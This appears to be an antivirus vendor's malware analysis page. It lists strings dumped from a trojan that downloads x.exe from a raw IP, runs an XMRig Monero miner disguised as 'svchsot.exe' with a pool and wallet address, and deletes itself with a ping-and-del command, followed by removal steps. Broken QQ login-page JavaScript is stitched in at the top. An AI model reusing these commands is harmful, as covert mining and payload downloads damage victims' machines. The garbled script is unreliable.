TCISD.stringStat.config = {webServerInterfaceURL:'//s.isdspeed.qq.com/cgi-bin/s.fcg',defaultParams:{dataId:1,reportRate:1,method:'get'}};

TCISD.stringStat.genHttpParamString = function(o){

res.push(k   '='   window.encodeURIComponent(o[k]));

return res.join('&');

window.QZFL = window.QZONE = window.QZFL || window.QZONE || {};

QZFL.dom = {

return document.getElementById(id);

return _doc.compatMode == "CSS1Compat"?_doc.documentElement.clientHeight:_doc.body.clientHeight;

return _doc.compatMode == "CSS1Compat"?_doc.documentElement.clientWidth:_doc.body.clientWidth;

QZFL.css = {

var _s = QZFL.css;

return names && ((elem && elem.classList && !_s._reClassToken.test(names))?elem.classList.add(names):_s.updateClassName(elem,null,names));

return names && ((elem && elem.classList && !_s._reClassToken.test(names))?elem.classList.remove(names):_s.updateClassName(elem,names));

if(!elem || elem.nodeType != 1){

var oriName = elem.className,_s = QZFL.css,ar,b;

ar = oriName.split(_s._reClassToken);

var i = 0,l = ar.length,n;

ar = addNames.split(_s._reClassToken);

l = ar.length;

ar = removeNames.split(_s._reClassToken);

ar.length = 0;

ar.push(k);

oriName = ar.join(' ');

elem.className = oriName;

QZFL.event = {

if(!obj.eventsListUID){

obj.eventsListUID = "e"   (  QZFL.event._objSeqUID);

if(!(l = QZFL.event._eventListDictionary[obj.eventsListUID])){

l = QZFL.event._eventListDictionary[obj.eventsListUID] = {};

fn.__elUID = "e"   (  QZFL.event._fnSeqUID)   obj.eventsListUID;

if(!l[eventType].handlers){

l[eventType].handlers = {};

handlers = l[eventType].handlers;

return fn.apply(obj,!argArray?[QZFL.event.getEvent(evt)]:([QZFL.event.getEvent(evt)]).concat(argArray));

if(obj.addEventListener){

obj.addEventListener(eventType,cfn,false);

}else if(obj.attachEvent){

res = obj.attachEvent("on"   eventType,cfn);

var evt = window.event || evt || null,c,_s = QZFL.event.getEvent,ct = 0;

c = arguments.callee;

while(c && ct < _s.MAX_LEVEL){

if((evt = c.arguments[0]) && (typeof(evt.button) != "undefined" && typeof(evt.ctrlKey) != "undefined")){

c = c.caller;

var $ = QZFL.dom.getById;

QZONE.LoginPage = {

var lp = QZONE.LoginPage,sl_url = $('small_url');

bg_img.src = styleList[randomData].bg;

if(styleList[randomData].logoColor){

var logoColor = styleList[randomData].logoColor;

QZFL.css.addClassName(document.body, "mode_dark");

QZFL.css.addClassName(document.body,'mode_dark');

if(styleList[randomData].bottomColor){

var bottomColor = styleList[randomData].bottomColor;

QZFL.css.addClassName(document.body, "mode_dark_footer");

QZFL.css.addClassName(document.body,'mode_dark_footer');

if(styleList[randomData].authorSign){

if(!styleList[randomData].authorPrev){

styleList[randomData].authorPrev = "";

if(styleList[randomData].authorHref){

href = getUrl(styleList[randomData].authorHref);

document.getElementById("j-author-message").innerHTML = '<span class="author-title">'   styleList[randomData].authorPrev   '</span><a target="_blank" href="'   href   '" onclick="TCISD.pv(\'ihome.qzone.qq.com\',\''   styleList[randomData].author_pv_key   '\');">'   styleList[randomData].authorSign   '</a>';

document.getElementById("j-author-message").innerHTML = "???";

function getUrl(url){

var http = "";

if(url){

if(url.toLowerCase().indexOf("hXXp://") == -1 && url.toLowerCase().indexOf("hXXps://") == -1){

http = window.location.protocol   "//";

return http   url;

TCISD.pv('ihome.qzone.qq.com',styleList[randomData].pv_key);

var sUrl = getParameter(location.href, 's_url');

sUrl = decodeURIComponent(sUrl).replace(/https?:\/\//g, '').replace(/\/\d /g, '').replace(/[\?\#](.?) |$/g, '');

TCISD.pv('user.qzone.qq.com', sUrl);

bg_img.onload = function(){

QZFL.css.addClassName(bg_img,'lay_background_img_fade_out');

lp.resizeBackground();

window.onload = function(){

lp.setLoginDivTop();

sl_url.href = p_smallUrl || '//i.qq.com/';

p_smallPic = '//qzs.qq.com/qzone/v6/v6_config/upload/'   p_smallPic;

if(window.ActiveXObject && (navigator.userAgent.indexOf('MSIE 6.0') > -1)){

document.execCommand('BackgroundImageCache',false,true);

sl_url.innerHTML = '<span class="img_wrap" style="background-image:url(\''   p_smallPic   '\');_filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src=\''   p_smallPic   '\');_background-image:none;">';

sl_url.innerHTML = '<img id="small_pic" src="'   p_smallPic   '" alt="" />';

sl_url.innerHTML = '<span class="img_slogan"></span>';

window.onresize = function(){

TCISD.pv('ihome.qzone.qq.com','login/i');

cw = QZFL.dom.getClientWidth(),

ch = QZFL.dom.getClientHeight(),

iw = bg_img.width,

ih = bg_img.height;

bg.style.width = cw   "px";

bg.style.height = ch   "px";

bg_img.style.width = cw   "px";

bg_img.style.height = new_h   "px";

bg_img.style.top = imgTop   "px";

bg_img.style.left = "";

bg_img.style.width = new_w   "px";

bg_img.style.height = ch   "px";

bg_img.style.left = imgLeft   "px";

bg_img.style.top = "";

setLoginDivTop:function(){

var dom_height = QZFL.dom.getClientHeight();

if(window.ActiveXObject && (navigator.userAgent.indexOf('MSIE 6.0') > -1) && dom_height < 600){

$('lay').style.height = '600px';

$('lay').style.height = '';

$('login_div').style.top = change_top   "px";

$('login_div').style.top = "100px";

QZONE.LoginPage.bootStrap();

var qq = getParameter(location.href, 'qzoneInIframe');

TCISD.stringStat(1000100, {

reportRate: 1

Iphgbnc.exe

hXXp://180.97.221.181:8980/x.exe

2017-07-31 19:24

C:\Windows\Iphgbnc.dat

~~}}}~~}}}

PeekNamedPipe

DisconnectNamedPipe

CreatePipe

WinExec

GetProcessHeap

GetWindowsDirectoryA

RegCreateKeyA

RegQueryInfoKeyA

RegCreateKeyExA

RegDeleteKeyA

RegEnumKeyExA

RegOpenKeyA

RegOpenKeyExA

RegCloseKey

ShellExecuteA

MapVirtualKeyA

keybd_event

UnhookWindowsHookEx

SetWindowsHookExA

GetKeyState

ExitWindowsEx

EnumWindows

InternetOpenUrlA

.text

`.rodata

`.rotext

`.rdata

@.data

.rsrc

@.reloc

""""$$$$&&&&((((****,,,,....00002222444466668888::::<<<<>>>>

#*1892 $

%,3:;4-&

'.5<=6/7>?

"#()01* $%&',-./2389:;4567<=>?

"*2:# 3;

$,4<%-5=

&.6>'/7?

iphlpapi.dll

lIngress.exe

arpguard.exe

zrclient.exe

zrupdate.exe

zreboot.exe

This user account is used by the Visual Studio .NET Debugger

ntdll.dll

svchost.exe_2184:

.text

`.rdata

@.data

.rsrc

@.reloc

GetProcessWindowStation

operator

/c @ping -n 5 127.0.0.1&del

SvcCtrlFnct = x

-o stratum tcp://pool.minexmr.com:7777 -u 44s9vg9Ugds3Svix2vS7Vz6xAWr5MVYzjXh4C4MZNxviAPtuKhiJBWSFQxZMkrnJnQGx3yNvZGyUr9RRREmpEHSL6nMRH82 -p x -k

E:\Conding\xmrig\back\Miner_Loader\Release\Miner_Loader.pdb

WinExec

KERNEL32.dll

USER32.dll

RegOpenKeyW

RegCloseKey

RegOpenKeyExW

ADVAPI32.dll

SHELL32.dll

OLEAUT32.dll

GetCPInfo

PQhh%F

InitOnceExecuteOnce

MaxPolicyElementKey

operator ""

operator co_await

%S#[k

not supported

operation in progress

operation not supported

operation would block

function not supported

inappropriate io control operation

"%s" hash self-test failed.

[%d-d-d d:d:d]%s %s%s

[%d-d-d d:d:d]

{"id":%llu,"jsonrpc":"2.0","method":"submit","params":{"id":"%s","job_id":"%s","nonce":"%s","result":"%s"}}

[%s:%u] getaddrinfo error: "%s"

{"id":%llu,"jsonrpc":"2.0","method":"login","params":{"login":"%s","pass":"%s","agent":"%s"}}

[%s:%u] JSON decode failed: "%s"

[%s:%u] error: "%s", code: %lld

[%s:%u] unsupported method: "%s"

[%s:%u] login error code: %d

{"id":%lld,"jsonrpc":"2.0","method":"keepalived","params":{"id":"%s"}}

[%s:%u] connect error: "%s"

[%s:%u] read error: "%s"

[%s:%u] DNS error: "%s"

[01;36m%s:%d

[01;30m%s

use pool %s:%d %s

[01;37m%u

[31m"%s"

accepted (%lld/%lld) diff %u "%s" (%llu ms)

[01;37m%s:%d

[01;37m%d

accepted (%lld/%lld) diff %u (%llu ms)

new job from %s:%d diff %d

.nicehash.com

stratum tcp://

userpass

%s: unsupported non-option argument '%s'

No pool URL supplied. Exiting.

XMRig 2.0.0

libuv/%s

libjansson/%s

unknown option -- %c

option requires an argument -- %s

option requires an argument -- %c

-o, --url=URL URL of mining server

-O, --userpass=U:P username:password pair for mining server

-p, --pass=PASSWORD password for mining server

-k, --keepalive send keepalived for prevent timeout (need pool support)

--nicehash enable nicehash support

--print-time=N print hashrate report every N seconds

unknown option -- %s

MSVC/%d

2.0.0

[01;36mXMRig/%s

[01;37m libuv/%s%s

* VERSIONS: XMRig/%s libuv/%s%s

[01;37mHUGE PAGES: %s, %s

* HUGE PAGES: %s, %s

[01;37mCPU: %s (%d) %sx64 %sAES-NI

* CPU: %s (%d) %sx64 %sAES-NI

* THREADS: %d, %s, av=%d, %sdonate=%d%%%s

[01;36m%d

[01;37m, %s, av=%d, %sdonate=%d%%%s

[01;37mPOOL #%d:

[01;36m%s:%d

* POOL #%d: %s:%d

speed 2.5s/60s/15m %s %s %s H/s max: %s H/s

[01;36m%s

[22;36m%s %s

[01;36m%s H/s

0123456789;

%s/%s (Windows NT %lu.%lu

) libuv/%s

msvc/%d

tX4Fr.rh.46Aw-wl-6

.eK9K\9.

%u.%u.%u.%u

0123456789

Unknown system error %d

address family not supported

ai_family not supported

socket type not supported

operation canceled

illegal operation on a directory

socket operation on non-socket

operation not supported on socket

operation not permitted

broken pipe

protocol not supported

cannot send after transport endpoint shutdown

1.12.1-dev

%s: (%d) %s

(%d) %s

0.0.0.0

ntdll.dll

kernel32.dll

powrprof.dll

.text$di

.text$mn

.text$x

.text$yd

.idata$5

.CRT$XCA

.CRT$XCAA

.CRT$XCC

.CRT$XCU

.CRT$XCZ

.CRT$XIA

.CRT$XIAA

.CRT$XIAC

.CRT$XIC

.CRT$XIZ

.CRT$XPA

.CRT$XPB

.CRT$XPX

.CRT$XPXA

.CRT$XPZ

.CRT$XTA

.CRT$XTZ

.rdata

.rdata$r

.rdata$sxdata

.rdata$zzzdbg

.rtc$IAA

.rtc$IZZ

.rtc$TAA

.rtc$TZZ

.xdata$x

.idata$2

.idata$3

.idata$4

.idata$6

.data

.data$r

.rsrc$01

.rsrc$02

WS2_32.dll

CreateIoCompletionPort

SetNamedPipeHandleState

CreateNamedPipeW

PeekNamedPipe

GetNamedPipeHandleStateA

ConnectNamedPipe

MapVirtualKeyW

GetProcessHeap

%s near '%s'

%s near end of file

unable to decode byte 0x%x

control character 0x%x

invalid Unicode '\uX\uX'

invalid Unicode '\uX'

NUL byte in object key not supported

duplicate object key

unable to open %s: %s

\\?\pipe

0.4.0

<requestedExecutionLevel level='asInvoker' uiAccess='false' />

1,2m2

?"?(?`?~?

7#7'7 7/737

7&8.868>8~8

00C0`0n0

5*51585|6

5(575\5~5

0 0$0(0,0

%DxEW

8S.ix

[.MD(]

i%c=H

H%S$V

VW.VH

E.fB y

$8QSSH

eQyÿ

00000000000

x%D;s

K&>.yC

.xJ>Hf

; Win64; x64) libuv/%s

.text$mn$00

.xdata

.pdata

<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>

7!7,8[8~8

mscoree.dll

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

KERNEL32.DLL

WUSER32.DLL

oKernel32.dll

%s\%s

%s %s

\svchost.exe

Akernel32.dll

minkernel\crts\ucrt\inc\corecrt_internal_strtox.h

__crt_strtox::floating_point_value::as_double

__crt_strtox::floating_point_value::as_float

ext-ms-win-ntuser-windowstation-l1-1-0

\\?\UNC\

%s\%.*s

sadvapi32.dll

VVV.xmrig.com

Copyright (C) 2016-2017 xmrig.com

xmrig.exe

E\\?\

Windows Help log

Windows Help logs.

svchsot.exe

C:\Users\"%CurrentUserName%"\AppData\Roaming\xmrig\svchost.exe

C:\Windows\TEMP\\svchsot.exe -o stratum tcp://pool.minexmr.com:7777 -u 44s9vg9Ugds3Svix2vS7Vz6xAWr5MVYzjXh4C4MZNxviAPtuKhiJBWSFQxZMkrnJnQGx3yNvZGyUr9RRREmpEHSL6nMRH82 -p x -k

C:\Windows\TEMP\\svchsot.exe

svchost.exe_3748:

.text

`.data

.rsrc

@.reloc

msvcrt.dll

API-MS-Win-Core-ProcessThreads-L1-1-0.dll

KERNEL32.dll

NTDLL.DLL

API-MS-Win-Security-Base-L1-1-0.dll

API-MS-WIN-Service-Core-L1-1-0.dll

API-MS-WIN-Service-winsvc-L1-1-0.dll

RPCRT4.dll

ole32.dll

ntdll.dll

_amsg_exit

RegCloseKey

RegOpenKeyExW

GetProcessHeap

svchost.pdb

version="5.1.0.0"

name="Microsoft.Windows.Services.SvcHost"

<description>Host Process for Windows Services</description>

<requestedExecutionLevel

Software\Microsoft\Windows NT\CurrentVersion\Svchost

Software\Microsoft\Windows NT\CurrentVersion\MgdSvchost

\PIPE\

Host Process for Windows Services

6.1.7600.16385 (win7_rtm.090713-1255)

svchost.exe

Windows

Operating System

6.1.7600.16385

svchsot.exe_2276:

.text

`.rdata

@.data

.rsrc

@.reloc

InitOnceExecuteOnce

MaxPolicyElementKey

operator

operator ""

operator co_await

%S#[k

not supported

operation in progress

operation not supported

operation would block

function not supported

inappropriate io control operation

"%s" hash self-test failed.

[%d-d-d d:d:d]%s %s%s

[%d-d-d d:d:d]

{"id":%llu,"jsonrpc":"2.0","method":"submit","params":{"id":"%s","job_id":"%s","nonce":"%s","result":"%s"}}

[%s:%u] getaddrinfo error: "%s"

{"id":%llu,"jsonrpc":"2.0","method":"login","params":{"login":"%s","pass":"%s","agent":"%s"}}

[%s:%u] JSON decode failed: "%s"

[%s:%u] error: "%s", code: %lld

[%s:%u] unsupported method: "%s"

[%s:%u] login error code: %d

{"id":%lld,"jsonrpc":"2.0","method":"keepalived","params":{"id":"%s"}}

[%s:%u] connect error: "%s"

[%s:%u] read error: "%s"

[%s:%u] DNS error: "%s"

[01;36m%s:%d

[01;30m%s

use pool %s:%d %s

[01;37m%u

[31m"%s"

accepted (%lld/%lld) diff %u "%s" (%llu ms)

[01;37m%s:%d

[01;37m%d

accepted (%lld/%lld) diff %u (%llu ms)

new job from %s:%d diff %d

.nicehash.com

stratum tcp://

userpass

%s: unsupported non-option argument '%s'

No pool URL supplied. Exiting.

XMRig 2.0.0

libuv/%s

libjansson/%s

unknown option -- %c

option requires an argument -- %s

option requires an argument -- %c

-o, --url=URL URL of mining server

-O, --userpass=U:P username:password pair for mining server

-p, --pass=PASSWORD password for mining server

-k, --keepalive send keepalived for prevent timeout (need pool support)

--nicehash enable nicehash support

--print-time=N print hashrate report every N seconds

unknown option -- %s

MSVC/%d

2.0.0

[01;36mXMRig/%s

[01;37m libuv/%s%s

* VERSIONS: XMRig/%s libuv/%s%s

[01;37mHUGE PAGES: %s, %s

* HUGE PAGES: %s, %s

[01;37mCPU: %s (%d) %sx64 %sAES-NI

* CPU: %s (%d) %sx64 %sAES-NI

* THREADS: %d, %s, av=%d, %sdonate=%d%%%s

[01;36m%d

[01;37m, %s, av=%d, %sdonate=%d%%%s

[01;37mPOOL #%d:

[01;36m%s:%d

* POOL #%d: %s:%d

speed 2.5s/60s/15m %s %s %s H/s max: %s H/s

[01;36m%s

[22;36m%s %s

[01;36m%s H/s

0123456789;

%s/%s (Windows NT %lu.%lu

) libuv/%s

msvc/%d

tX4Fr.rh.46Aw-wl-6

.eK9K\9.

%u.%u.%u.%u

0123456789

Unknown system error %d

address family not supported

ai_family not supported

socket type not supported

operation canceled

illegal operation on a directory

socket operation on non-socket

operation not supported on socket

operation not permitted

broken pipe

protocol not supported

cannot send after transport endpoint shutdown

1.12.1-dev

%s: (%d) %s

(%d) %s

0.0.0.0

ntdll.dll

kernel32.dll

powrprof.dll

.text$di

.text$mn

.text$x

.text$yd

.idata$5

.CRT$XCA

.CRT$XCAA

.CRT$XCC

.CRT$XCU

.CRT$XCZ

.CRT$XIA

.CRT$XIAA

.CRT$XIAC

.CRT$XIC

.CRT$XIZ

.CRT$XPA

.CRT$XPB

.CRT$XPX

.CRT$XPXA

.CRT$XPZ

.CRT$XTA

.CRT$XTZ

.rdata

.rdata$r

.rdata$sxdata

.rdata$zzzdbg

.rtc$IAA

.rtc$IZZ

.rtc$TAA

.rtc$TZZ

.xdata$x

.idata$2

.idata$3

.idata$4

.idata$6

.data

.data$r

.rsrc$01

.rsrc$02

WS2_32.dll

CreateIoCompletionPort

SetNamedPipeHandleState

CreateNamedPipeW

PeekNamedPipe

GetNamedPipeHandleStateA

ConnectNamedPipe

KERNEL32.dll

MapVirtualKeyW

USER32.dll

ADVAPI32.dll

GetProcessHeap

GetCPInfo

%s near '%s'

%s near end of file

unable to decode byte 0x%x

control character 0x%x

invalid Unicode '\uX\uX'

invalid Unicode '\uX'

NUL byte in object key not supported

duplicate object key

unable to open %s: %s

\\?\pipe

0.4.0

719437097711488

C:\Windows\TEMP\svchsot.exe

pool.minexmr.com

<requestedExecutionLevel level='asInvoker' uiAccess='false' />

1,2m2

?"?(?`?~?

7#7'7 7/737

7&8.868>8~8

00C0`0n0

5*51585|6

5(575\5~5

0 0$0(0,0

minkernel\crts\ucrt\inc\corecrt_internal_strtox.h

__crt_strtox::floating_point_value::as_double

__crt_strtox::floating_point_value::as_float

mscoree.dll

ext-ms-win-ntuser-windowstation-l1-1-0

\\?\UNC\

%s\%.*s

sadvapi32.dll

VVV.xmrig.com

Copyright (C) 2016-2017 xmrig.com

xmrig.exe

conhost.exe_2264:

.text

`.data

.rsrc

@.reloc

GDI32.dll

USER32.dll

msvcrt.dll

ntdll.dll

API-MS-Win-Core-LocalRegistry-L1-1-0.dll

KERNEL32.dll

IMM32.dll

ole32.dll

OLEAUT32.dll

PutInputInBuffer: EventsWritten != 1 (0x%x), 1 expected

Invalid message 0x%x

InitExtendedEditKeys: Unsupported version number(%d)

Console init failed with status 0x%x

CreateWindowsWindow failed with status 0x%x, gle = 0x%x

InitWindowsStuff failed with status 0x%x (gle = 0x%x)

InitSideBySide failed create an activation context. Error: %d

GetModuleFileNameW requires more than ScratchBufferSize(%d) - 1.

GetModuleFileNameW failed %d.

Invalid EventType: 0x%x

Dup handle failed for %d of %d (Status = 0x%x)

Couldn't grow input buffer, Status == 0x%x

InitializeScrollBuffer failed, Status = 0x%x

CreateWindow failed with gle = 0x%x

Opening Font file failed with error 0x%x

\ega.cpi

NtReplyWaitReceivePort failed with Status 0x%x

ConsoleOpenWaitEvent failed with Status 0x%x

NtCreatePort failed with Status 0x%x

GetCharWidth32 failed with error 0x%x

GetTextMetricsW failed with error 0x%x

GetSystemEUDCRangeW: RegOpenKeyExW(%ws) failed, error = 0x%x

RtlStringCchCopy failed with Status 0x%x

Cannot allocate 0n%d bytes

|%SWj

O.fBf;

ReCreateDbcsScreenBuffer failed. Restoring to CP=%d

Invalid Parameter: 0x%x, 0x%x, 0x%x

ConsoleKeyInfo buffer is full

Invalid screen buffer size (0x%x, 0x%x)

SetROMFontCodePage: failed to memory allocation %d bytes

FONT.NT

Failed to set font image. wc=x, sz=(%x,%x)

Failed to set font image. wc=x sz=(%x, %x).

Failed to set font image. wc=x sz=(%x,%x)

FullscreenControlSetColors failed - Status = 0x%x

FullscreenControlSetPalette failed - Status = 0x%x

WriteCharsFromInput failed 0x%x

WriteCharsFromInput failed %x

RtlStringCchCopyW failed with Status 0x%x

CreateFontCache failed with Status 0x%x

FTPh

\>.Sj

GetKeyboardLayout

MapVirtualKeyW

VkKeyScanW

GetKeyboardState

UnhookWindowsHookEx

SetWindowsHookExW

GetKeyState

ActivateKeyboardLayout

GetKeyboardLayoutNameA

GetKeyboardLayoutNameW

_amsg_exit

_acmdln

ShipAssert

NtReplyWaitReceivePort

NtCreatePort

NtEnumerateValueKey

NtQueryValueKey

NtOpenKey

NtAcceptConnectPort

NtReplyPort

SetProcessShutdownParameters

GetCPInfo

conhost.pdb

%$%a%b%V%U%c%Q%W%]%\%[%

%<%^%_%Z%T%i%f%`%P%l%g%h%d%e%Y%X%R%S%k%j%

version="5.1.0.0"

name="Microsoft.Windows.ConsoleHost"

<requestedExecutionLevel

name="Microsoft.Windows.ConsoleHost.SystemDefault"

publicKeyToken="6595b64144ccf1df"

name="Microsoft.Windows.SystemCompatible"

version="6.0.0.0"

publicKeyToken="6595b64144ccf1df"

< =$>:>@>

2%2X2

%SystemRoot%

\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\TrueTypeFont

\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\FullScreen

WindowSize

ColorTableu

ExtendedEditkeyCustom

ExtendedEditKey

Software\Microsoft\Windows\CurrentVersion

\ !:=/.<>;|&

%d/%d

cmd.exe

desktop.ini

\console.dll

%d/%d

6.1.7601.17641 (win7sp1_gdr.110623-1503)

CONHOST.EXE

Windows

Operating System

6.1.7601.17641

WerFault.exe_556:

.text

`.data

.rsrc

@.reloc

ADVAPI32.dll

ntdll.DLL

KERNEL32.dll

USER32.dll

msvcrt.dll

ole32.dll

OLEAUT32.dll

SHLWAPI.dll

IMM32.dll

wer.dll

COMCTL32.dll

faultrep.dll

Starting kernel vertical - %S

rundll32.exe

NtQueryInformationProcess failed with status: 0x%x

Reporting never started for process id %u

StringCchPrintf failed with 0x%x

NtWow64QueryInformationProcess64 failed with 0x%x

NtWow64ReadVirtualMemory64 failed with 0x%x

NtQueryInformationProcess failed with status 0x%x

WerpNtWow64QueryInformationProcess64 failed with status 0x%x

StringCchCopy failed with 0x%x

Invalid arg in %s

wdi.dll

dbgeng.dll

dbghelp.dll

SETUPAPI.dll

SHELL32.dll

VERSION.dll

WTSAPI32.dll

WerFault.pdb

PSShD

tSSh,<

t.PSj6

t5SSh

SShx`

tsShxc

t.Ph0j

_amsg_exit

RegCloseKey

RegCreateKeyExW

RegOpenKeyExW

RegEnumKeyExW

RegQueryInfoKeyW

GetProcessHeap

GetWindowsDirectoryW

RegDeleteKeyW

ReportEventW

RegOpenKeyW

RegSetKeyValueW

GetProcessWindowStation

EnumWindows

NtAlpcSendWaitReceivePort

NtAlpcConnectPort

ShipAssert

ntdll.dll

RegisterErrorReportingDialog

WerReportSubmit

WerReportAddFile

WerReportCreate

WerReportCloseHandle

WerReportSetUIOption

WerpGetReportConsent

WerpSetIntegratorReportId

WerpReportCancel

WerpAddRegisteredDataToReport

WerReportAddDump

WerpCreateIntegratorReportId

WerpSetReportFlags

WerpGetReportFlags

WerpIsTransportAvailable

WerReportSetParameter

WerpInitiateCrashReporting

version="1.0.0.0"

name="Microsoft.Windows.Feedback.Watson"

name="Microsoft.Windows.Common-Controls"

version="6.0.0.0"

publicKeyToken="6595b64144ccf1df"

<asmv3:windowsSettings xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">

</asmv3:windowsSettings>

<requestedExecutionLevel

ÝCD0

#$$$3355<

##$$$335566

% "#$$$3355666=

"#$$33555666

!.DQ$

.Py>o

Kÿg

.ib:?

T3%X_

a,M.cbd

KEYW8

KEYWH

? ?$?(?,?0?4?8?

1 2$2(2,20242

>,?0?4?8?<?@?

?%?5?:?|?

5'565^5{5

3#3(353_3

=#='= =/=3=7=;=?=

=#=(=>=]=

>!>&>3>}>

1!1&131[1

Microsoft\Windows\WindowsErrorReporting\WerFault

%s %s

Global\WerKernelVerticalReporting

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CrashControl

CrashDumpEnabled.Old

CrashDumpEnabled.New

%SystemRoot%\MEMORY.DMP

LiveKernelReports

Software\Microsoft\Windows\Windows Error Reporting\LiveKernelReports

LiveKernelReportsPath

BCCode=%x&BCP1=%p&BCP2=%p&BCP3=%p&BCP4=%p&OS Version=%u_%u_%u&Service Pack=%u_%u&Product=%u_%u

*WerKernelReporting

%SYSTEMROOT%\SYSTEM32\WerFault.exe -k -rq

SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

SOFTWARE\Microsoft\Windows\Windows Error Reporting\KernelFaults\Queue

sysdata.xml

%s -k -q

SOFTWARE\Microsoft\Windows NT\CurrentVersion

<OSVER>%u.%u.%u %u.%u</OSVER>

<OSLANGUAGE>%u</OSLANGUAGE>

<ARCHITECTURE>%u</ARCHITECTURE>

<PRODUCTTYPE>%u</PRODUCTTYPE>

<FILESIZE>%u</FILESIZE>

<CREATIONDATE>d-d-d d:d:d</CREATIONDATE>

<NAME>%s</NAME>

<DATA>%s</DATA>

<ERROR>Failed at Step: %s with error 0x%x</ERROR>

%sDrivers\%s.sys

</%s>

<%s>%s</%s>

%u.%u.%u.%u

*.mrk

WER-%u-%u.sysdata.xml

Software\Microsoft\Windows\CurrentVersion\CEIPRole\RolesInWER

SOFTWARE\Microsoft\Windows\CurrentVersion\Reliability\MemoryDiagnostic

Web Server

Software\Microsoft\Windows\Windows Error Reporting\Debug

%SystemRoot%\Minidump

0xx (0xx, 0xx, 0xx, 0xx)

%s\%2.2d%2.2d%2.2d-%u-%2.2d.dmp

*.dmp

Software\Microsoft\Windows\Windows Error Reporting

Software\Policies\Microsoft\Windows\Windows Error Reporting

\KernelObjects\SystemErrorPortReady

%s\%s

Microsoft.Windows.Setup

\WindowsErrorReportingServicePort

(0x%x): %s

%u %s

WindowsNTVersion

%u.%u

ErrorPort

\StringFileInfo\xx\%s

HKEY_USERS\

HKEY_CURRENT_CONFIG\

HKEY_CLASSES_ROOT\

HKEY_LOCAL_MACHINE\

HKEY_CURRENT_USER\

%s="%s"

%s.%s

%s %d

Software\Microsoft\Windows\Windows Error Reporting\Hangs

_NT_EXECUTABLE_IMAGE_PATH

wxmu.dmp

wxhu.dmp

axmu.dmp

axhu.dmp

hu.kdmp

mu.kdmp

hu.dmp

mu.dmp

Software\Microsoft\.NETFramework

NOT_TCPIP

sos.dll

version.xml

.version.xml

%s.xml

memory.hdmp

minidump.mdmp

Local\WERReportingForProcess%d

atk.kdmp

Software\Microsoft\Windows\Windows Error Reporting\Hangs\NHRTimes

%i|%d|%d

xxxxxxxxxxxxxxxx

xx

%d.%d.%d.%d

D:P(A;;GA;;;BA)(A;;GA;;;SY)(A;;GA;;;%s)

D:P(A;;GA;;;BA)(A;;GA;;;SY)(A;;GA;;;%s)S:(ML;;NR;;;HI)

dc.noreflect

dc.xpmemdump

dc.xpdata

dc.CustomDump

dc.expmodmem

dc.expmoddata

dc.OnDemandKdmp

dc.xpmodmem

dc.xpmoddata

default=%s

memory=%s

module=%s

.dbgcfg.ini

ElevatedDataCollectionStatus.txt

Open process failed unexpectedly: 0X%X

Attempting to cross-proc reporting process!

Elevation:Administrator!new:%s

Reflection attempt failed: 0X%X

Attempting to reflect reporting process!

Could not collect dump for reflection cross process: 0x%x

Could not collect xproc for reflection: 0x%x

CollectFile for reflection failed: 0x%x

Could not collect dump for cross process: 0x%x

CollectReflectionDump failed with: 0x%x

0 processes found for xproc module: %s

Could not collect cross dump from module: 0x%x

CollectCrossProcessModuleDumps failed: 0x%x

CollectCrossProcessDumps failed: 0x%x

KernelDump failed: 0x%x

ProcessHandle

%s|%s

rpcrt4

\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AeDebugProtected\AutoExclusionList

\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AeDebug\AutoExclusionList

\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AeDebugProtected

\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AeDebug

sntdll.dll

WerDiagController.dll

Software\Microsoft\Windows\Windows Error Reporting\Plugins

Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers

Software\Microsoft\Windows\Windows Error Reporting\Plugins\FDR\CurrentSession

%s\%s\%u-%u.etl

%s\%s\%u-%u.etl_%d

Microsoft\Windows\FDR

%s-%d

Software\Microsoft\Windows\Windows Error Reporting\Plugins\DriverVerifier

Software\Microsoft\Windows\Windows Error Reporting\Plugins\AppRecorder

%d-AppRecorderEnabled

%s /stop

psr.exe

Software\Microsoft\Windows\Windows Error Reporting\RuntimeExceptionHelperModules

verifier.dll

nVerifier.dll

Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%s

Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

lsvchost.exe

"%s" "%s" "%s"

%s\system32\cofire.exe

psapi.dll

sfc_os.dll

werfault.exe

%s\%s-(PID-%u)-%u

%s\%s-(PID-%u).dmp

%s\*-(PID-*)-*

SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\%s

SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit

kernel32.dll

kernelbase.dll

ReportingMode

WinShipAssert

WindowsMessageReportingB1

Windows

ws2_32.dll

Software\Microsoft\SQMClient\%s\AdaptiveSqm\ManifestInfo

%s\Sqm%d.bin

CorporateWerPortNumber

BypassDataThrottling

Software\Microsoft\Windows\Windows Error Reporting\Consent

Windows Problem Reporting

6.1.7600.16385 (win7_rtm.090713-1255)

WerFault.exe

Windows

Operating System

6.1.7600.16385

Microsoft-Windows-WER-Diag/Operational

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):

WerFault.exe:556
Iphgbnc.exe:3996
Picture.exe:4068
%original file name%.exe:3656
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:

C:\Windows\Temp\WER4E01.tmp.WERInternalMetadata.xml (51540 bytes)
C:\Windows\Temp\WER4DB2.tmp.appcompat.txt (3176 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\x[1].exe (434673 bytes)
C:\Picture.exe (442977 bytes)
